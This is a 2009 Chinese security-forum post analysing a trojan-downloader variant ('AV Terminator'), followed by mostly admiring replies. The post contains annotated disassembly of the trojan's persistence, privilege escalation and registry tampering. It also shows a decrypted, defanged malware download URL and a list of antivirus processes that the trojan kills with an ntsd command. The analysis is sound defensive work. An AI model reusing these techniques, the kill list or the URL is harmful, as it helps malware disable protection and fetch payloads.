首页
社区
课程
招聘
[原创]AV终结者新变种
发表于: 2009-1-22 12:46 17650

[原创]AV终结者新变种

2009-1-22 12:46
17650

一、病毒标签:
病毒名称:  AV终结者新变种TrojWare.Win32.TrojanDownloader.KillAV
病毒类型:  下载者
文件SHA1: 3ed481ed4280121aea776575a3417a45a2f833b2
危害等级:  3
文件长度:  脱壳前40,703 字节,脱壳后200,656 字节
受影响系统:Microsoft Windows NT 4.0
Microsoft Windows NT 4.0 Terminal Services Edition
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003
开发工具: Delphi
加壳类型: Upack 0.3.9 beta2s -> Dwing

二、病毒描述:
   病毒复制自身到系统system\目录,文件名称jjxzwzjy090121.exe,并释放出jjxzajcj32dl.dll。劫持杀软,jjxzajcj32dl.dll注

入到ie后访问并下载大量病毒木马。

三、行为分析:
1、病毒复制自身到系统system\目录,文件名称jjxzwzjy090121.exe,并释放出jjxzajcj32dl.dll。

Upack:00178CA6                 call    @System@@LStrAsg$qqrpvpxv ; System::__linkproc__ LStrAsg(void *,void *)
.Upack:00178CAB                 push    offset aJjxzwzjy ; "jjxzwzjy"
.Upack:00178CB0                 push    dword_17B6E4
.Upack:00178CB6                 push    offset a_exe    ; ".exe"
.Upack:00178CBB                 mov     eax, offset dword_17B674
.Upack:00178CC0                 mov     edx, 3
.Upack:00178CC5                 call    @System@@LStrCatN$qqrv ; System::__linkproc__ LStrCatN(void)
.Upack:00178CCA                 mov     eax, offset dword_17B670
.Upack:00178CCF                 mov     ecx, dword_17B674
.Upack:00178CD5                 mov     edx, dword_17B6D0
.Upack:00178CDB                 call    @System@@LStrCat3$qqrv ; System::__linkproc__ LStrCat3(void)
.Upack:00178CE0                 mov     eax, offset dword_17B71C
.Upack:00178CE5                 mov     edx, dword_17B670 ; C:\WINDOWS\system\jjxzwzjy090121.exe
Upack:00178D3B                 call    CopyFileA       ; 将自身复制到C:\WINDOWS\system\jjxzwzjy090121.exe
Upack:00178F05                 call    sub_177E54      ; 修改注册表达到自启动目的
.Upack:00178F53                 call    modify_reg_     ; 修改注册表键值:dlncjjcdfc
.Upack:00178F53                                         ; 指向数据:%SystemRoot%\system\jjxzwzjy090102.exe,提权,遍

历进程
Upack:00178A58                 mov     eax, offset aStartup ; "Startup"
.Upack:00178A5D                 call    @System@@LStrCopy$qqrv ; System::__linkproc__ LStrCopy(void)
.Upack:00178A62                 mov     ecx, [ebp-28h]
.Upack:00178A65                 mov     edx, offset aSoftwareMicr_2 ; 

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
.Upack:00178A6A                 mov     eax, 80000001h
.Upack:00178A6F                 call    RegQueryValueExA_1 ; 注册表查询键值
Upack:00178A84                 mov     eax, offset a32333831303938 ; "323338313039383237363430363835326A777C7"...
.Upack:00178A89                 call    @Adodb@TCustomADODataSet@ClearCalcFields$qqrpc ; 

Adodb::TCustomADODataSet::ClearCalcFields(char *)
.Upack:00178A8E                 mov     edx, [ebp-2Ch]
.Upack:00178A91                 mov     eax, offset dword_17B720
.Upack:00178A96                 call    @System@@LStrAsg$qqrpvpxv ; System::__linkproc__ LStrAsg(void *,void *)
.Upack:00178A9B                 lea     edx, [ebp-30h]
.Upack:00178A9E                 mov     eax, dword_17B720
.Upack:00178AA3                 call    sub_174E44      ; 解密call,解密后为hxxp://www.a3168.com/mydown.asp
.Upack:00178B32                 call    sub_174A58      ; 提权
.Upack:00178B37                 call    sub_176E4C      ; avp.e
Upack:00178C8C                 call    sub_176960      ; 遍历枚举下列安全进程名,一旦发现尝试使用“ntsd -c q –p pid

”命令关闭该安全进程,实现自身的保护
.Upack:00178C8C                                         ; RUNIEP.exe
.Upack:00178C8C                                         ; KRegEx.exe
.Upack:00178C8C                                         ; KVXP.kxp
.Upack:00178C8C                                         ; 360tray.exe
.Upack:00178C8C                                         ; RSTray.exe
.Upack:00178C8C                                         ; QQDoctor.exe
.Upack:00178C8C                                         ; DrRtp.exe
Upack:00178E3C                 call    WritePrivateProfileStringA_0 ; 写入文件C:\Documents and Settings\All 

Users\jjjydf16.ini
.Upack:00178E3C                                         ; 内容为:
.Upack:00178E3C                                         ; [mydown]
.Upack:00178E3C                                         ; old_exe=
.Upack:00178E3C                                         ; old_dll32=
.Upack:00178E3C                                         ; ver=090121
.Upack:00178E3C                                         ; fnexe=C:\WINDOWS\system\jjxzwzjy090121.exe
.Upack:00178E3C                                         ; reg_start=dlmcjjcdfc
.Upack:00178E3C                                         ; fn_dll=C:\WINDOWS\system\jjxzajcj32dl.dll
Upack:001782A8                 mov     edx, offset aIexp ; "iexp"
.Upack:001782AD                 call    @System@@LStrCat$qqrv ; System::__linkproc__ LStrCat(void)
.Upack:001782B2                 mov     eax, ebx        ; iexplore.exe
.Upack:001782B4                 mov     edx, offset aLore_exe ; "lore.exe"
.Upack:001782B9                 call    @System@@LStrCat$qqrv ; System::__linkproc__ LStrCat(void)
.Upack:001782BE                 push    offset aNo      ; "no"
.Upack:001782C3                 mov     ecx, offset aCheck_associat ; "Check_Associations"
.Upack:001782C8                 mov     edx, offset aSoftwareMicros ; Software\Microsoft\Internet Explorer\Main
.Upack:001782CD                 mov     eax, 80000001h
.Upack:001782D2                 call    modify_reg_
.Upack:001782D7                 push    0               ; hKey
.Upack:001782D9                 mov     ecx, offset aEnableautodial ; "EnableAutodial"
.Upack:001782DE                 mov     edx, offset aSoftwareMicr_0 ; 

Software\Microsoft\Windows\CurrentVersion\Internet Settings
.Upack:001782E3                 mov     eax, 80000001h
.Upack:001782E8                 call    RegSetValueExA_0
.Upack:001782ED                 push    0               ; hKey
.Upack:001782EF                 mov     ecx, offset aNonetautodial ; "NoNetAutodial"
.Upack:001782F4                 mov     edx, offset aSoftwareMicr_0 ; 

Software\Microsoft\Windows\CurrentVersion\Internet Settings
.Upack:001782F9                 mov     eax, 80000001h
.Upack:001782FE                 call    RegSetValueExA_0
.Upack:00178303                 push    0               ; hKey
.Upack:00178305                 mov     ecx, offset aCheckedvalue ; "CheckedValue"
.Upack:0017830A                 mov     edx, offset aSoftwareMicr_1 ; 

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
.Upack:0017830F                 mov     eax, 80000002h
.Upack:00178314                 call    RegSetValueExA_0 ; 修改注册表键值
.Upack:00178319                 xor     eax, eax

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 7
支持
分享
最新回复 (28)
雪    币: 232
活跃值: (25)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
2
顶....学习了~
2009-1-22 12:49
0
雪    币: 709
活跃值: (2420)
能力值: ( LV12,RANK:1010 )
在线值:
发帖
回帖
粉丝
3
建议分析厉害病毒。

都是些老技术拼凑出来,没什么特点。
2009-1-22 12:52
0
雪    币: 383
活跃值: (41)
能力值: ( LV12,RANK:530 )
在线值:
发帖
回帖
粉丝
4
坐书生的屁股~!我不乖~!

期待书生
2009-1-22 12:56
0
雪    币: 204
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
好强啊!!!
2009-1-22 12:58
0
雪    币: 443
活跃值: (200)
能力值: ( LV9,RANK:1140 )
在线值:
发帖
回帖
粉丝
6
只是学习一下病毒的行为,我是小菜啊啊,看了两个,眼睛都看花了!!!我水平太低了,努力!
2009-1-22 12:58
0
雪    币: 709
活跃值: (2420)
能力值: ( LV12,RANK:1010 )
在线值:
发帖
回帖
粉丝
7
哪里呀,弄点厉害病毒分析下(最好附带驱动),我们也可以多学点嘛。

btw: 我什么壳都不会脱,加油ing
2009-1-22 13:01
0
雪    币: 443
活跃值: (200)
能力值: ( LV9,RANK:1140 )
在线值:
发帖
回帖
粉丝
8
没办法,驱动我只能识别而已!
2009-1-22 13:04
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
很荣幸的来参观下书生的新作品
2009-1-22 13:15
0
雪    币: 370
活跃值: (15)
能力值: ( LV9,RANK:170 )
在线值:
发帖
回帖
粉丝
10
哪有那么多新技术,有效的就是最好的
2009-1-22 14:53
0
雪    币: 251
活跃值: (25)
能力值: ( LV9,RANK:290 )
在线值:
发帖
回帖
粉丝
11
期待精通驱动的牛人出手
2009-1-22 15:15
0
雪    币: 251
活跃值: (25)
能力值: ( LV9,RANK:290 )
在线值:
发帖
回帖
粉丝
12
同意,想想“熊猫”就知道
另一方面,无论技术怎么发展,在攻防过程中最容易突破的都是人
2009-1-22 15:16
0
雪    币: 159
活跃值: (339)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
13
病毒名称:  AV终结者新变种TrojWare.Win32.TrojanDownloader.KillAV

建议注明是哪家AV报的名称
2009-1-22 15:34
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
14
新的病毒可能只是集百家之所长
2009-1-22 21:36
0
雪    币: 163
活跃值: (60)
能力值: ( LV9,RANK:210 )
在线值:
发帖
回帖
粉丝
15
支持一下。。。。。。。。。。。。。
2009-1-22 21:58
0
雪    币: 167
活跃值: (1574)
能力值: ( LV9,RANK:250 )
在线值:
发帖
回帖
粉丝
16
来顶一下过年还送好文章的仁兄
2009-1-22 22:20
0
雪    币: 321
活跃值: (271)
能力值: ( LV13,RANK:1050 )
在线值:
发帖
回帖
粉丝
17
支持,期待更多作品。
2009-1-23 09:30
0
雪    币: 279
活跃值: (160)
能力值: ( LV9,RANK:170 )
在线值:
发帖
回帖
粉丝
18
就是书生自报的
2009-1-23 13:55
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
19
书生确实很厉害 学习一下
2009-1-24 00:04
0
雪    币: 107
活跃值: (404)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
20
支持啊..................支持....膜拜楼主
2009-1-24 18:10
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
21
问一下 书生 怎么 解密的 网址  啊 指教 一下  用防火墙  么 还是 网络 端口 查看工具啊 指教 一下 QQ

610774680   谢谢
2009-1-24 22:09
0
雪    币: 471
活跃值: (4003)
能力值: ( LV9,RANK:170 )
在线值:
发帖
回帖
粉丝
22
都是些老技术的拼盘,的确没有意思啊
2009-1-25 10:38
0
雪    币: 197
活跃值: (52)
能力值: ( LV5,RANK:70 )
在线值:
发帖
回帖
粉丝
23
新鲜的病毒不是很多(⊙o⊙)哦
2009-1-25 16:20
0
雪    币: 224
活跃值: (10)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
24
还会有下个 CIH 吗
2009-2-6 17:22
0
雪    币: 104
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
25
Mark~
2009-10-10 13:49
0
游客
登录 | 注册 方可回帖
返回
//